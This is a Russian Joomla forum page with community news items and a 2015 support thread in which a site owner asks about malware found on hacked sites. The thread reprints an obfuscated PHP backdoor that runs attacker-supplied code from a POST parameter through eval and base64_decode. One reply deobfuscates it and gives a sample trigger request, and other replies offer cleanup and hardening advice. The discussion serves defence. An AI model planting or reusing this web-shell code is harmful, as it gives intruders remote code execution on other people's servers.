Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 1057 Просмотров
*

stydent

  • Захожу иногда
  • 150
  • 1 / 0
  • vlad-link.ru
Что за вирус
« : 03.12.2015, 12:05:22 »
уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
Записан
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Что за вирус
« Ответ #1 : 03.12.2015, 14:33:41 »
Я бы задался вопросом, не "что за вирус", а как он попадает на сайт.
Удалить варез и неиспользуемые расширения, сканер aibolit по серваку, поставить rsfirewall, не держать пачку сайтов в одном аккаунте, проверить свой комп и т.п.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Что за вирус
« Ответ #2 : 03.12.2015, 16:03:59 »
Цитата: stydent от 03.12.2015, 12:05:22
уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
Бональный бегдор:
Цитировать
if (isset ($_POST['n052e33']) ) { eval (base64_decode($_POST['n052e33'])) ;}
при обращение к файлу POST запросам приводит к выполнению произвольного кода
POST: n052e33=cGhwaW5mbygpOw==
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Что за вирус
« Ответ #3 : 03.12.2015, 16:55:48 »
Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.
Записан
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Что за вирус
« Ответ #4 : 03.12.2015, 17:20:22 »
Согласна с kik84, но даже если удалить варезное, вирус будет сидеть, пока не вычистишь полностью, потому что, он добавляет файлы, скрипты и прочую хрень.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет, смысл вашего сообщения? "Чистите!" что ему чистить? ТС даже не знает что это за вирус.

Такое ощущение, что только с баблом сюда надо приходить, за каждым советом. Изначально форум поддержки вроде бы был.
« Последнее редактирование: 03.12.2015, 17:25:53 от 12mv »
Записан
*

stydent

  • Захожу иногда
  • 150
  • 1 / 0
  • vlad-link.ru
Re: Что за вирус
« Ответ #5 : 03.12.2015, 17:23:56 »
Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
2. Удалить варез - это что?
Записан
*

12mv

  • Давно я тут
  • 548
  • 20 / 0
  • Гульсина
Re: Что за вирус
« Ответ #6 : 03.12.2015, 17:27:36 »
Цитата: stydent от 03.12.2015, 17:23:56
Мне нужны пояснения:
2. Удалить варез - это что?

Удалить те приложения, модули, которые вы скачали со сторонних ресурсов а не у разработчика купили. То же самое касается и шаблона.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Что за вирус
« Ответ #7 : 03.12.2015, 17:50:23 »
Цитата: stydent от 03.12.2015, 17:23:56
Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
Это значит на каждый сайт сделать отдельного юзера, который будет иметь свою отдельную группу привилегий, в результате чего, пользователь с другой группы привилегий не будет иметь доступа к управлению файлами, но и тут есть подводные камни, по мимо создания отдельных пользователей под каждый сайт, нужно еще и сам сервак безопасно настроить, а для этого вам нужен свой сервак, а не шаред хостинг, ну или если совсем бюджетный вариант, то на шаред хостинге под каждый сайт отдельный договор(аккаунт).
В таком случае если не уследили за одним сайтом, другие сайты не пострадают, ну или снизится риск значительно...

Цитата: wishlight от 03.12.2015, 16:55:48
Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.
Тут поспорю, все зависит от вашей опытности и мастерства, и какой порядок действий вы выбераите.
« Последнее редактирование: 03.12.2015, 17:58:11 от winstrool »
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Что за вирус
« Ответ #8 : 03.12.2015, 18:53:46 »
Цитата: winstrool от 03.12.2015, 17:50:23
опытности и мастерства

Да, это так. Сейчас есть хостинги, которые хотя бы ограничивают выполнение скрипта директорией домена.

Цитата: 12mv от 03.12.2015, 17:20:22
wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет

Раньше пользователи рассказывали, сколько сайтов, что стоит, чем пользовались при доступе к сайту, кто имеет доступ к сайту. А мой совет думаю был бы полезен в том плане что "уже второй сайт".

А после того, как сайты изолируются, смотрим на каждом расширения и сверяемся с к примеру https://vel.joomla.org/ или можно поставить Securitycheck, у них список тоже базовых уязвимостей в компоненте. Устраняем их и чистим сайт. Для новичков идеально подходит скрипт ai-bolit.

В данном случае скорее всего на каком-то сайте была уязвимость до обновления (или есть) и через нее залит шелл, и с него все лезет.

Rsfirewall еще купить надо. ТС не сообщал, что он пользовался варезом.
Записан
*

stydent

  • Захожу иногда
  • 150
  • 1 / 0
  • vlad-link.ru
Re: Что за вирус
« Ответ #9 : 03.12.2015, 22:54:47 »
Сайты на разных площадках. Но оба на timeweb. На хостинге beget не было случаев подобного заражения.

Варез....т.е. все что бесплатное может легко быть взломано?
Обычно пользуюсь известными компонентами и модулями: virtualmat, BT Content Slider

пока спасает запрет на выполнения php в директориях. по логам видно что хакер 403 ответ получает когда запускает свой вирус.
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Что за вирус
« Ответ #10 : 03.12.2015, 23:01:17 »
Варез - это все программное обеспечение, скачанное не с сайтов авторов или других официальных репозиториев. В результате может содержать пиратский вредоносный код.

У вас наверно такого нет. Это для общей информации.

Сайты обновлены? Хороший хостинг ukraine.com.ua если знать как им пользоваться. У  таймвеба в плане помощи в таких случаях никак.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 4173 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 5495 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

 Ответов: 6
Просмотров: 3818 		Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

 Ответов: 13
Просмотров: 2441 		Последний ответ 16.05.2021, 18:52:24
от alekcae
На сайте появился вирус

Автор Lifar

 Ответов: 3
Просмотров: 1461 		Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite